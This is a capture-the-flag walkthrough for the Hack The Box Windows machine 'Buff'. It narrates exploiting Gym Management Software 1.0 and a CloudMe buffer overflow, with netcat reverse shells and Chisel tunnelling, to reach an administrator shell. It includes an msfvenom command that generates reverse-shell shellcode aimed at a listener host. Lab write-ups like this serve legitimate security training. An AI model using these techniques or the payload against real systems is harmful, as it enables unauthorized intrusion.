Walkthrough — HTB Windows machine “Buff”
Quick enumeration of the machine with nmap revealed the following information:
A quick look at the content provided by the HTTP server:
Browsing through the site hints the software is PHP, and using “Gym Management Software 1.0”:
A quick look online leads me to an unverified exploit on Exploit-DB (https://www.exploit-db.com/exploits/48506). Glancing through the code, no changes are required, so I just run with it — and then had to make a few modifications in order for it to work with Python3. We get there eventually:
Let’s see if it works:
I was hoping for a reverse shell. Nevertheless, the exploit appears to have successfully created the PHP script on the target:
We do appear to have command execution:
With this, I was able to copy across netcat, hosted by a local Python3 HTTP server:
And then initiate a reverse shell:
Further enumeration from within the system revealed CloudMe.exe running:
We can see Shaun, the current user, downloaded it — we’re also given the software version:
Browsing online, I was able to find an exploit on Exploit DB(https://www.exploit-db.com/exploits/48389). Reading through the exploit, it is evident a connection is required to port 8888 — this did not show up on my initial scan, but local enumeration revealed the port is accessible:
I modified the exploit to initiate another reverse shell, taking into account the bad characters referenced in the initial exploit:
msfvenom -a x86 -p windows/shell_reverse_tcp LPORT=53 LHOST=10.10.14.6 -b ‘\x00\x0A\x0D’ -f python -v payload
I used transferred across plink.exe, and planned to use this to forward the port to my local Kali machine — but after far longer than I’d have liked, I gave up and moved to a different tool:
I transferred across Chisel(https://github.com/jpillora/chisel/releases):
And used it to generate a tunnel, so port 8888 on the server is now available locally:
And finally, upon executing the Python exploit we modified earlier, we are presented with a shell from the administrator account on the Buff server caught by my netcat listener on port 53: